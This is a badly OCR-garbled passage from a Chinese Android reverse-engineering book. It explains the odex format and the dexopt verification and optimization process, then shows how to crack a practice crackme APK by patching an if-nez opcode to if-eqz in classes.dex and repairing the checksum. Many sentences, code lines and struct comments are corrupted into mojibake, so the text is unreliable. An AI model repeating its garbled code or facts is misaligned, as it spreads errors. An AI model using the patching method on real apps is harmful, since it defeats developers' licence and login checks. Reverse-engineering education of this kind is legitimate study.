/* track memory overhead for auxillary structures */ 


int overhead; 


/* additional app-specific data structures associated with the DEX */ 


/ /void* auxData; 


可 以 看 到 ， 这 个 DexFile 结 构 中 存 入 的 多 为 其 它 结构 的 指针 。DexFile 最 
前 面 的 DexOptHeader 就 是 odex 的 头 ，DexLink 以 下 的 部 分 被 称 为 “auxillary 
section”， 即 辅助 数据 段 ， 它 记录 了 dex 文 件 被 优化 后 添加 的 一 些 信息 。 然 
而 ，DexFile 结 构 描 述 的 是 加 载 进 内 存 的 数据 结构 ， 还 有 一 些 数据 是 不 会 加 
载 进 内 存 的 ， 经 过 分 析 ，odex 文 件 结构 定义 整理 如 下 。 


struct ODEXFile { 


DexOptHeader header; /* odex 文 件 头 */ 
DEXFile dexfile; /* dex 文 件 */ 
Dependences deps; /* WENE */ 
ChunkDexClassLookup lookup; /* 类 查询 结构 */ 
ChunkRegisterMapPool mappool; /* 映射 池 */ 
ChunkEnd end; /* 结束 标志 */ 


); 

DexOptHeader 结 构 与 DexFile 中 的 定义 相同 ，DEXFile 为 上 一 节 中 定义 的 
结构 ，Dependences 为 odex 的 依赖 库 列 表 ，ChunkDexClassLookup、 
ChunkRegisterMapPool、ChunkEnd 是 整合 后 的 数据 结构 ， 下 一 节 会 对 它们 
来 进行 逐个 介绍 。 


4.4.3 ”odex 文 件 结构 分 析 


ODEXFile 的 文件 头 DexOptHeader 在 DexFile.h 文 件 中 定义 如 下 。 
struct DexOptHeader { 


ul magic[8]; /* odqex 版 本 标识 */ 

u4 dexOffset; /* dex 文 件 头 偏 移 */ 

u4 dexLength; /* dex 文 件 总 长 度 */ 

u4 depsOffset; /* odex 依 赖 库 列 表 候 移 */ 

u4 depsLength; /* 依赖 库 列 表 总 长 度 */ 

u4 optOffset; /* "BER ELE te / 

u4 optLength; /* 辅助 数据 总 长 度 */ 

u4 flags; /* 标志 */ 

u4 checksum; /* 依赖 库 与 辅助 数据 的 检验 和 */ 


}; 

magic 字 段 与 DexHeader 结 构 中 的 magic 字 段 类 似 ， 它 标识 了 一 个 有 效 的 
odex 文 件 ， 目 前 它 的 值 固 定 为 “64 65 79 0A 30 33 36 00”，dexOffset 字 段 为 
dex 文 件 头 的 偏 移 ， 目 前 它 的 值 等 于 DexOptHeader 结 构 大 小 0x28，dexLength 
字段 为 dex 文 件 的 总 大 小 ，depsoOtffset 字 段 为 依赖 库 的 起 始 偏 移 ，depsLength 


字段 为 依赖 库 的 总 长 度 ，flags 字 段 为 DexoptFlags 中 的 常量 值 ， 标 识 了 Dalvik 
虚拟 机 加 载 odex 时 的 优化 与 验证 选项 ，checksum 字 段 为 odex 文 件 的 检验 
和 ， 标 识 了 odex 是 否 合法 有 效 。 

DexOptHeader 结 构 以 下 为 DEXFile， 在 上 一 节 我 们 已 经 进行 过 介绍 ， 如 
果 读 者 还 有 不 清楚 的 地 方 ， 可 以 回头 阅读 上 一 节 的 内 容 。 接 下 来 是 
Dependences 结 构 ，Dependences 结 构 不 会 被 加 载 进 内 存 ， 而 且 Android 源 码 
中 它 也 没有 被 明确 定义 ， 通 过 阅读 Android 系 统 源码 ， 笔 者 整理 后 的 结构 如 


下 。 
struct Dependences { 
u4 modWhen; /* WEE */ 
u4 crc; /* 校 验 */ 
u4 DALVIK VM BUILD; /* Dalvik 虚 拟 机 版 本 号 */ 
u4 numDeps; /* 依赖 库 个 数 */ 
struct f 
u4 len; /* Dame 字 人 符 串 的 长 度 */ 
ul name[len]; /* 依赖 库 的 名 称 */ 
kSHAlDigestLen signature; /* SHA-1 哈 希 值 */ 
} table[numDeps]; 
E 


Dependences 结构 的 具体 操作 函数 为 Android 系 统 源 码 目 录 中 
dalvikxvmvanalysis\DexPrepare.cpp 文 件 的 writeDependenciesO 图 数 ， 它 的 代码 
片段 如 下 。 


static int writeDependencies(int fd, u4 modWhen, u4 crc) 


buf = (ul*)malloc (bufLen); 

set4LE(buf«0, modWhen); / [53 AE] [8] EX 

set4LE(buf«4, crc); // 写 入 crc 检 验 

set4LE (buf+8, DALVIK_VM_BUILD); // 写 入 Dalvik 虚 拟 机 版 本 号 

set4LE (buf+12, numDeps); // 写 入 依赖 库 的 个 数 

ul* ptr = buf + 4*4; // 跳 过 前 4 个 字段 

for (cpe = gDvm.bootClassPath; cpe-»ptr != NULL; cpe++) ( /1/ 循 环 写 入 依 
赖 库 


const ul* signature = getSignature(cpe);// 计 算 SHA-1 哈 希 值 


int len = strlen(cacheFileName) +1; 


set4LE (ptr, len); 

ptr += 4; 

memcpy (ptr, cacheFileName, len); // 写 入 依赖 库 文 件 名 
ptr += len; 

memcpy (ptr, signature, kSHAlDigestLen); // 写 入 SHA-1 哈 希 值 
ptr += kSHAlDigestLen; 


modWhen A RI R (6145, Bl classes.dex B Br EE, cre 1E Bl classes.dex 
的 crc 检 验 值 ， 这 两 个 字段 的 值 是 通过 dalvilNlibdex\ZipArchive.cpp 文 件 中 提 
供 的 dexZipGetEntryInfo() K 2X R 3& EX BJ 5. DALVIK, VM, BUILD 字段 为 
Dalvik SANUS hz m, RISIRRZNBSZRZXE XB), fEAndroid 2.2.3 中 它 的 
值 是 19，Android 2.3—2.3.77323, Android 4.07-4.17327, numDeps Ff HIK 
赖 库 的 个 数 。table 结 构 的 连续 个 数 是 由 numDeps 字 段 决定 的 ， 每 个 table 结 构 
由 3 个 字段 组 成 ， 用 来 描述 一 个 依赖 库 的 文件 信息 ，table 结 构 的 第 1 个 字段 
len 指 定 了 第 2 个 字段 name 占 用 的 字 节 数 ， 第 2 个 字段 name 指 定 了 依赖 库 的 完 
整 路 径 名 ， 第 3 个 字段 signature 为 依赖 库 的 SHA-1 哈 希 值 ， 它 用 来 确保 依赖 
库 的 版 本 正确 无 误 。 

下 面 对 照 Hello.odex 文 件 ， 验 证 一 下 相应 的 Dependences 结 构 信 息 ， 如 图 
4-8 所 示 ，0x10 处 的 depsOffset 字 段 值 为 0x358，0x14 处 的 depsLength 字 段 值 为 


0x2c6， 计 算 可 知 Dependences 结 构 所 占用 的 区 域 为 0x358~0x61e。 


图 4-8 ”DexOptHeader 结 构 


从 0x358 开 始 读 取 4 个 双 字 ， 可 以 得 出 时 间 发 modWhen 为 40f28eea，crc 
检验 值 为 90e09371，Dalvik 虚 拟 机 版 本 为 0x17， 依 赖 库 个 数 numDeps 为 8， 
表示 接 下 来 有 8 个 连接 的 table 结 构 ， 最 后 整理 可 得 出 表 4-8 所 示 的 结果 。 

表 4-8 ”依赖 库 列表 


0 0x39 /data/dalvik-cache/system(a)framework (d) 
core.jar(a)classes.dex 

Ox41 /data/dalvik-cache/system(a)framework(ag)bouncycastle. 
jar(aclasses.dex 

2 0x38 /data/dalvik-cache/system(a) framework (dà) 
ext.jar(Q)classes.dex 

4 PEN /data/dalvik-cache/system@framework@ framework. 
jar@classes.dex 

4 0x43 /data/dalvik-cache/system(a)framework(a)android.policy. 
jar(Q)classes.dex 

5 0x3d /data/dalvik-cache/system(@framework(@services. 
jar@classes.dex 

6 Ox3f /data/dalvik-cache/system(a)framework(a)core-junit. 
jar@classes.dex 

7 Ox47 /data/dalvik-cache/system(a)app(g)MotoSinaWeather2 Service. 
apk(a)classes.dex 


Dependences 结 构 下 面 为 3 个 Chunk 块 ， 它 们 被 Dalvik 虚 拟 机 加 载 到 一 个 
称 为 auxillary 的 段 中 。3 个 Chunk 块 是 由 DexPrepare.cpp 文件 中 的 
writeOptData0) 图 数 写 入 的 ， 它 的 代码 如 下 。 


static bool writeOptData(int fd, const DexClassLookup* pClassLookup, 
const RegisterMapBuilder* pRegMapBuilder) { 
if (!writeChunk(fd, (u4) kDexChunkClassLookup, //*jAXChunkDexClassLookup 
pClassLookup, pClassLookup-»size)) ( 
return false; 
) 
if (pRegMapBuilder !- NULL) ( 
if (!writeChunk(fd, (u4) kDexChunkRegisterMaps, //'jAChunkRegisterMapPool 
pRegMapBuilder-»data, pRegMapBuilder-»size)) ( 


return false; 


) 
if (!writeChunk(fd, (u4) kDexChunkEnd, NULL, 0)) ( //*3AXChunkEnd 


return false; 


) 


return true; 


) 
AE SC ER XE REX. writeChunk() AAS ANB, writeChunk() PK ZA FRE X. f 1 
个 header， 它 的 定义 如 下 。 
union { /* save a syscall by grouping these together */ 
char raw[8]; 
struct { 
u4 type; 
u4 size; 
) ts; 


) header; 
这 个 header 结 构 占 用 了 8 个 字 节 ，writeChunk0 国 数 在 写 入 具体 的 结构 时 
会 先 填充 这 个 结构 ， 其 中 的 type 字 段 为 1 个 以 kKDexChunk 开 头 的 枚 举 常量 ， 


它 的 值 定义 如 下 。 
enum { 
kDexChunkClassLookup = 0x434c4pb50, y= GQLKP wy 
kDexChunkRegisterMaps = 0x524d4150, /* RMAP */ 
kDexChunkEnd = 0x41454e44, /* AEND */ 


Fz 

size 则 为 需要 填充 的 数据 的 字 节 数 。 写 入 ChunkDexClassLookup 结 构 时 
writeOptData() RI Z& [5] writeChunk() EK| 2 fz 3& T 1 DexClassLookup£é 14] B $8 
针 ， 它 的 结构 声明 如 下 。 


struct DexClassLookup { 


int size; // total size, including "size" 
int numEntries; // size of table[]; always power of 2 
struct { 

u4 classDescriptorHash; // class descriptor hash code 

int classDescriptorOffset; // in bytes, from start of DEX 

int classDefOffset; // in bytes, from start of DEX 
) table[1]; 


}; 

Dalvik 虚 拟 机 通过 DexClassLookup 结 构 来 检索 dex 文 件 中 所 有 的 类 ， 其 
中 size 字 上 段 为 本 结构 的 字 节 数 ，numEntries 字 段 为 接 下 来 的 table 结 构 的 项 
数 ， 通 常 值 为 2， 而 table 结 构 用 来 描述 了 类 的 信息 ，classDescriptorHash 字 段 
与 classDescriptorOffset 字 段 为 类 的 哈 希 值 与 类 描述 ，classDefOffset 字 段 为 措 
向 DexClassDef 结 构 的 指针 。 

根据 上 面 的 分 析 ， 可 以 总 结 出 ChunkDexClassLookup 的 结构 声明 如 下 。 


struct ChunkDexClassLookup { 
Header header; 
DexClassLookup lookup; 
); 
E A ChunkRegisterMapPool£& 14] Bt writeOptData() EK] 2X [5] writeChunk() Efl 
AX fe 3$ T 1T Register MapBuilder 结 构 指 针 。RegisterMapBuilder 结 构 是 通过 
dvmGenerateRegisterMapsO 国 数 填充 的 ，dvmGenerateRegisterMaps0O 图 数 会 
调 用 writeMapsAllClasses() 图 数 填 充 所 有 的 类 的 映射 信息 ， 而 
writeMapsAllClasses() K Zi X. Z 35] FH writeMapsAlIMethods() A ŠUA 76 FI 8 75 
法 的 映射 信息 ，writeMapsAllMethods0 国 数 接着 调用 writeMapForMethod0 函 
数 依次 填充 每 个 方法 的 映射 信息 ， 并 调用 computeRegisterMapSize0 孙 数 计 
算 填充 的 每 个 方法 映射 信息 的 长 度 以 便 循环 遍历 所 有 的 方法 。 最 后 ， 整 理 
出 的 ChunkRegisterMapPool 的 结构 声明 如 下 。 


struct ChunkRegisterMapPool ( 
Header header; 
struct { 
struct RegisterMapClassPool ( 
u4 numClasses; 
u4 classDataOffset[1]; 
) classpool; 


struct RegisterMapMethodPool { 


u2 methodCount; 
u4 methodData[1]; 
}; 
)lookup; 


J3 

E AChunkEndZ&f4By , writeOptData() EKIZX [5] writeChunk() A Z& f£ 3& T 1 
个 NULL 指 针 。 根 据 传递 的 kDexChunkEnd 类 型 来 判断 ，odex 文 件 最 后 的 8 个 
字 节 应 该 固定 为 “44 AE 45 4100 00 00 00”。 整 理 后 的 ChunkEnd 结 构 声 明 如 
下 。 


struct ChunkEnd { 
Header header; 
); 
到 此 ，odex 文 件 就 讲解 完了 。 为 了 便于 理解 odex 文 件 格式 ， 笔 者 画 了 
一 张 odex 文 件 结构 图 ， 读 者 可 以 参照 随 书 的 附 图 2 来 辅助 学 习 。 


4.5 ”dex 文 件 的 验证 与 优化 工具 dexopt 的 工作 过 程 


为 了 使 Android 程 序 在 Dalvik 虚 拟 机 中 能 够 良好 并 快速 的 运行 ， 有 必要 
对 dex 文 件 进 行 验证 与 优化 。 通 常情 况 下 ， 验 证 与 优化 dex 文 件 最 简单 且 最 
安全 的 方法 是 直接 在 虚拟 机 中 加 载 dex 文 件 ， 这 样 一 旦 程序 加 载 失 败 ， 就 说 
明 dex 文 件 未 优化 或 验证 失败 ， 此 时 中 止 程序 运行 即 可 。 不 季 的 是 ， 这 会 引 
起 部 分 资源 难以 从 内 存 中 释放 ， 比 如 加 载 的 native 动 态 库 。 因 此 ， 让 验证 优 
化 工作 与 需要 执行 的 代码 在 同一 虚拟 机 中 运行 不 是 很 好 的 解决 方案 。 


为 了 解决 这 个 问题 ，Android 提 供 了 一 个 专门 验证 与 优化 dex 文 件 的 工具 
dexopt。 它 的 源码 位 于 Android 系 统 源码 的 dalvik\dexopt 目 录 下 ，Dalvik 虚 拟 
机 在 加 载 一 个 dex 文 件 时 ， 通 过 指定 的 验证 与 优化 选项 来 调用 dexopt 进 行 相 
应 的 验证 与 优化 操作 。 

dexopt B È $2 Fr fV 83 73 OptMain.cpp, XE FR 4^ 38 apk/jar/zip 文件 中 
classes.dex BS K k} extractAndProcessZip(), extractAndProcessZip() Ei Zp 38833. 
dexZipFindEntry() 遂 数 检查 目标 文件 中 是 否 拥有 classes.dex， 如 果 没 有 就 失 
败 返回 ， 成 功 的 话 调用 dexZipGetEntryInfo0 因 数 来 读 取 classes.dex 的 时 间 戳 
与 crc 检 验 值 ， 如 果 这 一 步 没 有 问题 ， 接 着 调用 dexZipExtractEntryTo-File0) 函 
数 释放 classes.dex 为 缓存 文件 ， 然 后 开始 解析 传递 过 来 的 验证 与 优化 选项 ， 
验证 选项 使 用 “v=” 指 出 ， 优 化 选项 使 用 “o=” 指 出 。 所 有 的 预备 工作 做 完 
后 ， 调 用 dvmPrepForDexOptO 函 数 启动 一 个 虚拟 机 进程 ， 在 这 个 函数 中 ， 优 
化 选项 dexOptMode 与 验证 选项 verifyMode 被 传递 到 了 全 局 DvmGlobals 结 构 
gDvm 的 dexOptMode 与 classVerifyMode 字 段 中 。 这 时 候 所 有 的 初始 化 工作 已 
经 完成 ，dexopt 调 用 dvmContinueOptimization0 国 数 开 始 真正 的 验证 与 优化 
工作 。 

dvmContinueOptimization0 芭 数 的 调用 链 比较 长 ， 我 们 慢 慢 来 看 。 首 先 
把 注意 力 从 OptMain.cpp 转 移 到 \dalvik\vm\analysis\DexPrepare.cpp， 因 为 这 里 
A dvmContinueOptimization() EKZ BJ] S230], ASH 7b x] dex c ^F 48 R BJ S7 
查 ， 确 保 传递 进来 的 目标 文件 属于 dex 或 odex， 接 着 调用 mmap0 国 数 将 整个 
文件 映射 到 内 存 中 ， 然 后 根据 gDvm 的 dexOptMode 与 classVerifyMode 字 段 来 
i& E doVerify E doOptPS ^A iR, EZ WS FHrewriteDex() EKI ZA 3K E 5j dex XC 
件 ， 这 里 的 重 写 内 容 包 括 字 符 序 调整 、 结 构 重 新 对 齐 、 类 验证 信息 以 及 畏 
助 数 据 。rewriteDex0) 阔 数 调用 dexSwapAndVerify() 调 整 字 节 序 ， 接 着 调用 
dvmDexFileOpenPartial() ĝl] £& DexFileZ& t4, dvmDexFileOpenPartial() El Zi Bj 
S- Xl f£ Android 系统 源码 dalvikvmNDvmDex.cpp X fF Fh, 3X A 2 J F8 
dexFileParse(Q EKZ &/rdex X fF, dexFileParse( EKZ: BXdex XC FAIA, H 
根据 需要 调用 验证 dexComputeChecksumO A 2X sk E FH 


dexComputeOptChecksum() 图 数 来 验证 dex 或 odex 文 件 头 的 checksum 与 
signature 字 段 。 
dexComputeChecksum( EK Zi B 48331 Fo 


u4 dexComputeChecksum(const DexHeader* pHeader) ( 
const ul* start - (const ul*) pHeader; 
uLong adler = adler32(0L, Z NULL, 0); 
const int nonSum = sizeof(pHeader-»magic) + sizeof(pHeader-»checksum); 
return (u4) adler32 (adler, start + nonSum, pHeader-»-fileSize - nonSum); 
) 


可 以 发 现 所 谓 的 checksum 实 际 是 调用 adler320 计 算 的 。 整 个 计算 的 步骤 
也 很 清楚 : 跳 过 DexHeader 的 magic 与 checksum 字 段 ， 从 第 3 个 字段 起 到 文件 
的 最 后 作为 计算 的 总 数据 长 度 ， 然 后 调用 adler32 标 准 算法 计算 数据 的 adler 
值 。 

dexComputeOptChecksum()EKIZX (ij F dalvikVibdex DexOptData.cpp X ft , 
它 的 代码 如 下 。 


u4 dexComputeOptChecksum(const DexOptHeader* pOptHeader) 1{ 
const ul* start = (const ul*) pOptHeader + pOptHeader-»depsOffset; 
const ul* end = (const ul*) pOptHeader + 
pOptHeader-»-optOffset + pOptHeader-»optLength; 
uLong adler - adler32(0L, Z NULL, 0); 
return (u4) adler32(adler, start, end - start); 


) 

odex 的 checksum 计 算 与 dex 的 方法 一 样 ， 只 是 取 值 范围 是 odex 文 件 最 后 
的 依赖 库 与 辅助 数据 两 个 数据 块 。 

接着 回 到 DvmDex.cpp 文件 中 继续 看 代码 ， 当 验证 成 功 后 ， 
dvmDexFileOpenPartial() EK] žk] FH allocateAuxStructures() EK] Šus Ei DexFile£Z 
构 辅 助 数据 的 相关 字段 ， 最 后 执行 完 后 返回 到 rewriteDex0O K 2X o 
rewriteDex() 接 下 来 调用 loadAllClasses() 加 载 dex 文 件 中 所 有 的 类 ， 如 果 这 一 
步 失 败 了 ， 程 序 等 不 到 后 面 的 优化 与 验证 就 退出 了 ， 如 果 没 有 错误 发 生 ， 
会 调用 verifyAndOptimizeClasses() 遂 数 进行 真正 的 验证 工作 ， 这 个 遂 数 会 调 
用 verifyAndOptimizeClass() K 2 R fi (5 5E Ug uE R w, rm 
verifyAndOptimizeClass()PK] 2 2:243 3x E& T E, 38 FHdvmVerifyClass()EKZdoit 
{TE FBRUSRdvmOptimizeClassQER2533117 Eo 


dvmVerifyClass() K 2X B*y SC WM R 83 fu F Android 系统 源码 的 
dalvikvvmsanalysis\DexVerify.cpp 文 件 中 。 这 个 函数 调用 verifyMethodO 函 数 对 
类 的 所 有 直接 方法 与 虚 方 法 进行 验证 ，verifyMethod0 孙 数 具 体 的 工作 是 先 
调用 verifyImstructionsO 函 数 来 验证 方法 中 的 指令 及 其 数目 的 正确 性 ， 再 调用 
dvmverifyCodeFlow0 函 数 来 验证 代码 流 的 正确 性 。 

dvmOptimizeClass() 图 数 的 实现 代码 位 于 Android 系 统 源 码 的 
dalvikwmanalysisVOptimize.cppX c ffFFR&. XA EKZ] FHoptimizeMethod() AŽ 
对 类 的 所 有 直接 方法 与 虚 方 法 进行 优化 ， 优 化 的 主要 工作 是 进行 “指令 替 
换 ”， 蔡 换 原 则 的 优先 级 为 “volatile” 替 换 - 正 确 性 蔡 换 -高 性 能 替换 。 比 如 指 
令 iget-wide 会 根据 优先 级 蔡 换 为 “volatile” 形 式 的 iget-wide-volatile， 而 不 是 高 
性 能 的 iget-wide-quick。 

rewriteDex() 阔 数 返 回 后 ， 会 再 次 调用 dvmDexFileOpenPartial() 来 验证 
odexX fF, $i FBdvmGenerateRegisterMaps() A Zi 3K IA 75 4A BJ] 2 358 [XC £i 
构 ， 填 充 结构 完成 后 ， 接 下 来 调用 updateChecksum() 冰 数 重 写 dex 文 件 的 
checksum 值 ， 再 往 下 就 是 writeDependenciesO) 与 writeOptData0 了， 这 两 个 团 
数 在 上 一 节 已 经 讨论 过 了 ， 此 处 不 再 歼 述 。 

至 此 ，dexopt 的 整个 验证 与 优化 过 程 就 分 析 完 了 ， 整 个 流程 调用 如 图 4- 
9 所 示 。 


dexopt main() d dexZipFindEntry() dexFileParse() 


fromZip() dexZipGetEntryInfo() dexComputeChecksum() 
processZipFile() dexZipExtractEntryToFile() dexComputeOptChecksunm() 
v " $ 
extractAndProcessZip() o dvmPrepForDexOpt() allocateAuxStructures() 


v 


[ dvmContinueOptimization() 


mmap() verifyAndOptimizeClass() 


i T dexSwapAndVerify() i 
rewriteDex() Y 


dvmVerifyClass() 


dvmDexFileOpenPartial() i 
verifyMethod() 
loadAllClasses() | 
dvmDexFileOpenPartial() ”所 一 i 
. verify AndOptimizeClasses() verifyInstructions() 


dvmGenerateRegisterMaps() 


$ 


writeDependencies() 


; | 


writeOptData() -一 一 optimizeMethod() «———4 dvmOptimizeClass() 


! 


dvmVerifyCodeFlow 


图 4-9 ”dexopt 的 验证 及 优化 过 程 


4.6 ”Android 应 用 程序 另类 破解 方法 


通过 本 书 第 2 章 的 学 习 ， 相 信 读 者 已 经 掌握 了 Android 程 序 的 一 般 破 解 方 
法 。 然 而 在 实际 的 动手 过 程 中 ， 每 次 修改 完 Smali 代 码 后 ， 使 用 ApkToo] 重 新 
编译 apk 程 序 都 会 花费 掉 大 量 的 时 间 ， 有 没有 一 种 快速 测试 apk 程 序 的 方法 
呢 ? 


Android 应 用 程序 的 代码 都 存储 在 dex 文 件 中 ， 通 过 修改 代码 中 的 执行 路 
径 是 否 就 可 以 达到 破解 程序 的 目的 呢 ? 相信 此 刻 读 者 心中 已 经 有 了 答案 。 
那 现在 的 问题 来 了 ， 如 何 定位 程序 的 破解 点 呢 ? 在 破解 的 世界 里 ， 有 一 款 
强大 的 静态 反 汇 编 工 具 IDA Pro， Eu ru e RER 


应 的 文件 偏 移 。 使 用 IDA Pro 分 析 Android 程 序 将 在 下 一 
仅 演 示 如 何 使 用 它 来 定位 破解 点 的 文件 偏 移 。 


进行 介绍 ， 本 小 节 


首先 使 用 zip 解 压缩 软件 取出 crackme02.apk 中 的 classes.dex 文 件 ， 将 程序 
拖 入 到 IDA Pro 软 件 中 ， 在 弹出 的 “Load a new file” 对 话 框 中 直接 点 击 OK 按 
钮 ， 进 入 程序 反 汇 编 界 面 ， 稍 等 片刻 ，IDA Pro 分 析 完 classes.dex 后 会 出 现 


如 图 4-10 所 示 界 面 。 


T IDA — Y:XworkspaceXchapter2X2. 2Xclasses. dex 
File Edit Jump Search View Üptions Windows He 


I" 
EN 
TETTE 


:ccessibilityS ervicelnfoCompat$&: 
ibiityServicelnfoCompat$áccessibility. 
iblltyServicelnfoCompat$Accessiblity. 
ibiltyServicelnfoCompal$Accessil iblity. 


nA 
A 
A 
À 
GET 
2A 
s) Acc: 
Acc: 
j| Acc 
FAM 
GET 


ibiity 

J| AccessibiityServicelnfoCompat cii (GV 
A AccessibillyServicelnfoCompat init GV 

7) AccessibiltyServicelnfoCompat. feedbackTyp. 


AccessibilityServicelnfoCompat flagT oString. C 


y AccessibilityServicelnfoCompat_getCanRetrie. 
"ij AccessibiltyServicelnfoCompat, gelDescriptio 
AccessibilityServicelnfoCompat, getld(LL 


J 
D00 # Input MD5 
88 # Input CRC32 
HEADER : 86888885 
HEADER : 88088088 
HEADER : 06008080 
HEADER : 00008000 
HEADER : 080060908 
E z089 


: E208B5E127F47844E54E7CFBEE3AIABA 
: 56DEB69C 


DEX Module, Interface version 7 
Input Dex File version 35 


je: Pure data 
-int unk 13E 


TYPES : 808803948 


< 
00000001 00000000: HEADER: word_0 


.int unk 155 


-int unk 1854 


TO EXP 


图 4-10 ”使 用 IDA Pro 分 析 classes.dex 文 件 


按照 第 2 章 中 的 破解 思路 ， 搜 索 unsuccessed 字 符 串 ， 在 IDA Pro 主 窗口 按 
下 ALT+T 键 ， 在 弹出 的 “Text search>” 搜 索 框 中 输入 unsuccessed 字 符 串 的 id 值 
0x7f05000c， 如 图 4-11 所 示 。 


À Text search (slow!) 


String |0x7£05000c 


Parameters 
F] Case sensitive 


口 Regular expression 
O Identifier 


[] Find all occurences 


破解 的 关键 点 。 


CODE : 8882CDB8 
CODE :8882CDBA 
COUDE:8882CDC8 
CODE : 8882CDC2 
CODE :8882CDC8 
CODE :8882CDCA 
CODE:8802CDDO 
CODE : 8882CDD2 
CODE : 8882CDD6 
CODE : 8882CDDR 
CODE:0802CDEG 
CODE : 6862CDE6 
CODE : 8882CDE8 
CODE : 8882CDEE 
COUDE:8882CDEE locret: 
CODE :8882CDEE 
CO0DE:0882CDF8 5 ------ 
CODE :0882CDF 8 
CO0DE:8882CDF8 loc 2CDF8: 
CODE :8882CDF8 
CODE : 8882CDF ^ 
CODE : 8882CDFA 
CODE :8882CE 80 
CODE : 8882CE 62 
CODE : 8882CE 88 
CODE : 8882CE 6C 
CODE :8882CE12 
CODE :0002CE14 
CODE : 6882CE1R 
CODE : 8862CE1E 
CODE : 8802CE2^ 
CODE : 8882CE2R 
CODE :8882CE2A 


Direction 
© Search Down 


O Search Up 


图 4-11 ”搜索 unsuccessed 字 符 串 


点 击 OK 按钮 开始 搜索 ， 稍 等 片刻 ， 就 定位 到 了 调用 的 代码 行 ， 如 图 4- 
12 所 示 ， 根 据 第 2 章 的 分 析 经 验 ， 可 以 判断 CODE:0002CDD2 行 的 代码 就 是 


moue-result-object 
inuoke-interface 
moue-result-object 
invoke-virtual 
move-result-object 
invoke-static 
moue-result 

if-nez 

iget-object 

const 
invoke-static 
movue-result-object 
invoke-virtual 


return-void 


iget-object 

const 
invoke-static 
move-result-object 
invoke-virtual 
iget-object 
invoke-static 
moue-result-object 
invoke-virtual 
iget-object 

const 
invoke-virtual 
goto 

Hethod End 


图 4-12 


v2 | 
{v2}, <ref Editable.toString() imp. @ def Editable toString 
v2 

{v2}, <ref String.trin() imp. @ def String trimeL> 

v2 

(v8, v1, v2», «boolean Hainfictiuity.access$2(ref, ref, ref) 
v8 

v8, loc 2kpF8 

v8, this, Mainfictivity$1 this$8 

v1, 8x7F05000C 
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IDA Pro 反 汇编 代码 界面 


点 击 IDA Pro 主 界面 上 的 “Hex View-A” 选 项 卡 ， 发 现 这 行 代 码 的 指令 
“39 00 0f 00”， 第 1 个 字 节 39 为 if-nez 指 令 的 Opcode， 我 们 只 需 和 将 其 改 成 ecz 
指令 的 Opcode 即 可 ， 翻 看 Dalvik 指 令 集 列表 得 知 if-eqz 的 Opcode 为 38。 关 闭 
IDA Pro， 在 弹出 的 Save datebase 对 话 框 中 勾 选 <DON'T SAVE the database" 
后 点 击 OK 退 出 程序 。 用 十 六 进 制 编辑 工具 打开 classes.dex 文 件 ， 本 书 使 用 
C32asm， 定 位 到 0x2cdd2 修 改 39 为 38， 然 后 保存 并 退出 。 

apk 程 序 安装 时 会 调用 dexopt 对 dex 进 行 验证 与 优化 。 在 4.5 小 节 讲 解 
dexopt 优 化 时 我 们 知道 ，dex 文 件 中 DexHeader 头 的 checksum 字 段 标 识 了 dex 
文件 的 合 din 被 纂 改过 的 dex 文 件 在 验证 时 计算 checksum 会 失败 ， 这 样 会 
导致 程序 安装 失败 ， 因 此 ， 我 们 需要 重新 计算 并 写 回 checksum 值 。 为 了 方 
便 处 理 这 个 问题 ， 笔 者 使 用 VC++ 编 号 了 一 个 DexFixer 工 具 专 门 用 来 重 写 dex 
文件 的 checksum。 运 行 DexFixer， 将 修改 过 的 classes.des 拖 到 它 的 界面 上 ， 
classes.dex 便 修复 完成 了 ， 效 果 如 图 4-13 所 示 。 


DexFixer 


抑 放 要 修复 的 DEX 人 Y 件 到 此 椒 

正在 验证 DEX 净 件 .. 

DEXK 件 标志 驼 证 通过 

DEX 文 件 SHA1 验 证 失败 

DEX 件 SHA1 值 已 修正 

CB 06 62 9A A8 C9 3B 79 8D 03 63 CF 0A 71 A1 D1 48 33 FF 44 
DEX3r fF checksuml& uE An 


DEXX fF checksum Pf 1E 
Adler32: 76273123 
所 有 操作 已 完成 


图 4-13 ”使 用 DexFixer 修 复 classes.dex 


将 修复 后 的 classes.dex 重 新 放 回 crackme02.apk 文 件 中 ， 然 后 删除 
crackme02.apk 中 的 夹 ， 这 个 时 候 crackme02.apk 就 修改 完成 
了 ， 只 需 对 它 进 行 签名 就 可 以 安装 测试 了 。 


47 ”本 章 小 结 


在 实际 分 析 Android 程 序 的 过 程 中 ，dex 或 odex 文 件 无 疑 是 最 常见 的 ， 本 
章 主要 介绍 这 两 种 文件 的 格式 ， 并 详细 分 析 了 dexopt 的 优化 与 验证 过 程 ， 最 
后 ， 笔 者 还 给 出 了 Android 程 序 的 另 一 种 破解 思路 。 通 过 本 章 的 学 习 ， 和 希望 
读者 能 够 对 Android 程 序 本 身 有 更 深层 次 的 认识 。 


第 5 章 ”静态 分 析 Android 程 序 


如 果 说 前 面 的 章节 是 在 “ 扎 马 步 *»， 那 么 从 本 章 起 ， 就 是 真正 的 武功 招 
式 了 。 静 人 态 分 析 是 探索 Android 程 序 内 幕 的 一 种 最 常见 的 方法 ， 它 与 动态 调 
试 双 剑 合 壁 ， 帮 助 分 析 人 员 解 决 分 析 时 四 到 的 各 类 “疑难 ”问题 。 然 而 ， 吏 
态 分 析 技 术 本 身 需要 分 析 人 员 具 备 较 强 的 代码 理解 能 力 ， 这 些 都 需要 在 平 
时 的 开发 过 程 中 不 断 地 积累 经 验 ， 很 难 想象 一 个 连 Android 应 用 程序 源码 都 
看 不 懂 的 人 去 逆向 分 析 Android 程 序 。 因 此 ， 在 开始 本 章 内 容 之 前 ， 假 定 读 
者 已 经 具备 了 基本 的 Android 程 序 开 发 知识 与 代码 阅读 能 力 。 


5.1 什么 是 静态 分 析 


静态 分 析 (Static Analysis) 是 指 在 不 运行 代码 的 情况 下 ， 采 用 词法 分 
析 、 语 法 分 析 等 各 种 技术 手段 对 程序 文件 进行 扫描 从 而 生成 程序 的 反 汇编 
代码 ， 然 后 阅读 反 汇 编 代码 来 掌握 程序 功能 的 一 种 技术 。 在 实际 的 分 析 过 
程 中 ， 完 全 不 运行 程序 是 不 太 可 能 的 ， 分 析 人 员 时 常 需要 先 运行 目标 程序 
来 寻找 程序 的 突破 口 。 静 态 分 析 强 调 的 是 静态 ， 在 整个 分 析 的 过 程 中 ， 阅 
读 反 汇编 代码 是 主要 的 分 析 工 作 。 生 成 反 汇 编 代 码 的 工具 称 为 反 汇 编 工 具 
或 反 编译 工具 ， 选 择 一 个 功能 强大 的 反 汇 编 工具 不 仅 能 获得 更 好 的 反 汇 编 
